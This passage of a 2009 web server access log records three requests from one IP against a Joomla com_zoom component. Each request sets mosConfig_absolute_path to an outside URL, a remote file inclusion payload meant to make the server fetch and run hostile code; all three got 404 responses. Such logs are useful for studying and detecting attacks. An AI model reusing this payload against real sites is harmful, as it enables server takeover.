65.23.158.226 - - [10/Jul/2009:05:44:06 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
65.23.158.226 - - [10/Jul/2009:05:44:06 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
65.23.158.226 - - [10/Jul/2009:05:44:06 -0400] "GET /logs/access_log.Q109061100//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 267 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" 201.234.41.5 - - [10/